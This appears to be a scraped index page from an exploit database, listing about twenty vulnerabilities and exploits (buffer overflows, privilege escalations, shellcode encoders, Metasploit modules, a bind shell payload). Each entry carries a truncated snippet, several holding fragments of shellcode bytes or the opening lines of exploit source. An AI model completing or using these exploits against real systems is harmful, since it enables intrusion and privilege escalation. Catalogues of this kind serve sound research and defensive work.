cURL and libcurl smb_request_state function information disclosure vulnerability

cURL/libcURL is a command line file transfer tool that supports FTP, FTPS, HTTP, HTTPS, GOPHER, TELNET, DICT, FILE and LDAP. A security vulnerability in the cURL and libcurl smbrequeststate functions allows remote attackers to conduct denial-of-service attacks by submitting requests of a speciall...

XFree86 4.2 XLOCALEDIR Local Buffer Overflow Vulnerability (3)

No description provided by source. source: http://www.securityfocus.com/bid/7002/info Several XFree86 utilities may be prone to a buffer overflow condition. The vulnerability exists due to insufficient boundary checks performed by these utilities when referencing the XLOCALEDIR environment...

Xt Library Local Root Command Execution Exploit

No description provided by source. include include include define DEFAULTOFFSET 0 define BUFFERSIZE 1491 long getespvoid asmmovl %esp,%eax\n; mainint argc, char argv char buff = NULL; unsigned long addrptr = NULL; char ptr = NULL; char execshell = \xeb\x23 \x5e \x8d\x1e \x89\x5e\x0b \x31\xd2...

OpenFTPD (<= 0.30.2) Remote Exploit

No description provided by source. / hoagieopenftpd.c LINUX/X86 OPENFTPD REMOTE EXLPOIT = 0.30.2 Searching for those warez ftpd's out there and leeching 'free' movies Remote Linux/OpenFTPD exploit for the format string bug in the message system. This vulnerability was rediscovered by a VOID.AT...

No-IP DUC <= 2.1.7 - Remote Code Execution Exploit

No description provided by source. / | |/ / / |/ / / / | / / / / /|/ / / / / / / / / / / / / // / / / / // / // // / //|// //// //,//,/ xenomuta arroba phreaker punto net http://xenomuta.tuxfamily.org/ - Methylxantina 256mg Permlink: http://xenomuta.tuxfamily.org/exploits/noIPwn3r.c...

Golden FTP Server 4.70 - PASS Command Buffer Overflow Exploit

No description provided by source. GoldenFTP 4.70 PASS Exploit Authors: Craig Freyman cd1zz and Gerardo Iglesias Galvan iglesiasgg Tested on XP SP3 Vendor Contacted: 1/17/2011 no response For this exploit to work correctly, you need to know the subnet that the server is running on. You also need ...

Knox Software Arkeia 4.0 Backup Local Overflow

No description provided by source. / source: http://www.securityfocus.com/bid/661/info Knox Software Arkeia 4.0 Backup rnavc & nlserverd HOME Environment Variable Buffer Overflow A local buffer overflow in the handling of the HOME environment variable by the rlserver and rnavc binaries that are...

S.u.S.E. Linux 6.2 sscw HOME Environment Variable Buffer Overflow Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/656/info A buffer overflow vulnerability in sscw's handling of the HOME environment variable allows local users to gain root privileges. !/bin/bash Linux x86 exploit for /usr/bin/sccw on SuSE 6.2 -Brock Tellier...

S.u.S.E. 5.2 lpc Vulnerabilty

No description provided by source. source: http://www.securityfocus.com/bid/328/info The PLP Line Printer Control program, shipped with S.u.S.E. 5.2 is vulnerable to a local remote buffer overflow. You can determine whether you're vulnerable or not by typing 'lpc'. If you're presented with an lpc...

HP JetDirect PJL Query Execution

No description provided by source. Exploit Title: HP JetDirect PJL Query Execution Date: Aug 7, 2011 Author: Myo Soe YGN Ethical Hacker Group - http://yehg.net/ Software Link: http://www.hp.com Version: All Tested on: HP LaserJet Pxxxx Series $Id: $ This file is part of the Metasploit Framework a...

MIPS Linux XOR Shellcode Encoder (60 Bytes)

No description provided by source. include fcntl.h include stdio.h include unistd.h include sys/types.h include sys/stat.h include stdlib.h include string.h define DEBUG 0 / entropy at phiral.net mips linux shellcode xor encoder \xAB\xCD is overwritten with jmp back offset \x00\x00 is overwritten...

PHP <= 4.4.6 / 5.2.1 ext/gd Already Freed Resources Usage Exploit

No description provided by source. ?php //////////////////////////////////////////////////////////////////////// // // // | || | | | | | | | || || \ // // | |/ || '|/ |/ -| ' \ / -/ |||| /| || / // // ||||,||| ,|||||||,| || |||||| // // // // Proof of concept code from the Hardened-PHP...

AASync 2.2.1.0 - (Win32) Stack Buffer Overflow (LIST)

No description provided by source. $Id: aasynclistreply.rb 11039 2010-11-14 19:03:24Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of...

CVE-2013-2163

Monkey HTTP Daemon monkeyd before 1.2.2 allows remote attackers to cause a denial of service infinite loop via an offset equal to the file size in the Range HTTP header...

Sub Encoder (optimised)

Encodes a payload using a series of SUB instructions and writing the encoded value to ESP. This concept is based on the known SUB encoding approach that is widely used to manually encode payloads with very restricted allowed character sets. It will not reset EAX to zero unless absolutely necessar...

Windows Gather Prefetch File Information

This module gathers prefetch file information from WinXP, Win2k3 and Win7 systems and current values of related registry keys. From each prefetch file we'll collect filetime converted to utc of the last execution, file path hash, run count, filename and the execution path. This module requires...

Novell Client 2 SP3 - &#039;nicm.sys 3.1.11.0&#039; Local Privilege Escalation

Novell Client 2 SP3 Privilege escalation exploit Tested on Windows 7 and 8 x86 / nicm.sys 3.1.11.0 Thanks to Master Ryujin : The first public information I have seen about this bug was from Nikita Tarakanov @NTarakanov I am not sure weather there was anything else public Exploit for DEMO purposes...

Light HTTPd 0.1 (Windows) - Remote Buffer Overflow

import urllib2 from time import sleep TitleWindows Light HTTPD v0.1 HTTP GET Buffer Overflow Discovered and Reported24th of April, 2013 Discovered/Exploited ByJacob Holcomb/Gimppy042 Software Vendorhttp://sourceforge.net/projects/lhttpd/?source=navbar Exploit/Advisoryhttp://infosec42.blogspot.com...

Sami FTP Server - &#039;LIST&#039; Buffer Overflow (Metasploit)

This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require 'msf/core' class Metasploit4 'Sami FTP Server...

Ruby Command Shell, Bind TCP IPv6

Continually listen for a connection and spawn a command shell via Ruby This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 524 include Msf::Payload::Single include Msf::Payload::Ruby...